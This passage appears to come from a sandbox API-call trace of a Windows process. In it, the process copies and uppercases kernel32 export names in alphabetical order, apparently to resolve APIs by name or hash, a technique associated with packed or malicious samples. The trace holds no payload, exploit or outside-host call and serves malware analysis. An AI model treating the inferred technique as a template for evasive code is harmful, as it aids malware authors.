lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.043] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.043] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.043] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.043] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.043] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.043] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.043] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.043] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.043] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.044] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.044] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.044] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.044] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.044] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.044] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.044] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.044] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.044] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.044] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.044] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.044] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.044] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.044] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.045] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.045] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.045] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.045] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.045] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.045] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.045] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.045] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.045] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.045] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.045] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.045] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.045] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.045] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.045] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.045] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.045] lstrlenA (lpString="COPYFILEA") returned 9 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.045] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.045] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.046] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.046] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.046] lstrlenA (lpString="COPYFILEW") returned 9 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.046] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.046] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.046] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.046] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.046] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.046] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.046] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.046] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.046] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.046] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.046] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.046] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.046] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.046] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.046] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.047] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.047] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.047] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.047] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.047] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.047] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.047] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.047] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.047] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.047] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.047] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.047] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.047] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.047] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.047] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.047] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.047] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.047] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.047] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.048] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.048] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.048] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.048] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.048] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.048] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.048] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.048] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.048] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.048] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.048] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.048] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.048] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.048] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.048] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.048] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.048] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.048] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.049] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.049] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.049] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.049] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.049] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.049] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.049] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.049] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.049] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.049] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.049] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.049] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.049] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.049] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.049] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.049] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.049] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.049] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.049] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.050] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.050] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.050] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.050] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.050] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.050] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.050] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.050] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" 